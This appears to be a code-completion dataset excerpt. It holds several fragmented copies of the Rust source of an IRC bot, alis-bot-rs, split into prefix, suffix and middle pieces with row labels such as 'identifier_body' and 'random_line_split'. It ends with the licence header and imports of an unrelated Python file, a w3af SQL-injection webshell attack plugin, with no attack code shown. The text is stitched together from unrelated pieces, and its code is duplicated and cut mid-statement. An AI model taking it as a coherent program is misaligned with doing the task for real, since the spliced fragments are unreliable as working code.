/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> |
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
} | identifier_body |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 |
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| {
return Err(format_err!("No valid configuration files found"));
} | conditional_block |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs", | "/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
} | "-c", | random_line_split |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn | () {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| directory_failures_errors | identifier_name |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
